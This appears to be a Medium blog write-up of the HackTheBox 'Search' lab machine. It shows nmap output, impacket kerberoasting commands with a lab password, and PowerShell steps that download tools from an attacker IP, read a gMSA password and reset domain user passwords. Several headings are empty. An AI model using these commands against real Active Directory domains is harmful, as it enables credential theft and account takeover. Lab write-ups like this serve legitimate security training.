HackTheBox-Search

NMAP

PORT      STATE SERVICE       VERSION            
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-19 09:28:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8172/tcp open ssl/http Microsoft IIS httpd 10.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49699/tcp open unknown
49725/tcp open msrpc Microsoft Windows RPC

PORT 139/445 (SMB)

PORT 80 (HTTP)

Foothold

python3 /opt/impacket/examples/GetUserSPNs.py  -target-domain search.htb -request -dc-ip 10.129.247.201 -usersfile new_users.txt search.htb/hope.sharp
python3 /opt/impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.247.201 search.htb/hope.sharp
:"IsolationIsKey?" -outputfile hashes.kerberoast

Privilege Escalate (Edgar.Jacobs)

Privilege Escalation (Sierra.Frye)

</sheetData><sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg==" saltValue="U9oZfaVCkz5jWdhs9AA8nA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Privilege Escalation (Tristan.Davies -> Administrator)

Method 1 (un-intended)

Method 2 (intended)

setuserinfo2 Tristan.Davies 23 'arzismol'

Method 3

Invoke-WebRequest -Uri http://ip/dsinterals.zip -UseBasicParsing -OutFile
Expand-Archive -Path dsinternals.zip -DestinationPath dsinternals
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties PrincipalsAllowedToRetrieveManagedPassword
$Credential = New-Object System.Management.Automation.PSCredential BIR-ADFS-GMSA$,$pt.SecureCurrentPassword
Invoke-Command -Computer Research -Credential $Credential -ScriptBlock { whoami}
Invoke-Command -Computer Research -Credential $Credential -ScriptBlock { net user Tristan.Davies arzissmol }

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Demystifying CFO’s Role In Cybersecurity

Big Data Privacy

Commanders, the most awaited Whitelist Registration Event for Doomsday Redemption is happening!

Cyber Threat Hunting — What Is It, Really?

THE SIGNIFICANCE OF ITHEUM PLATFORM

MetaMask Wallet Login — Best Crypto Wallet & Gateway to Blockchain Apps

SCAMMERS on LINKEDIN?

Here is how I reversed engineered Intel’s IPPSRSA library with almost a 100000 assembly…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

HackTheBox-Shibboleth

Secret — Hackthebox Walkthrough

UTCTF 2022 — Writeup

Responder 🚨 HackTheBox | Walkthrough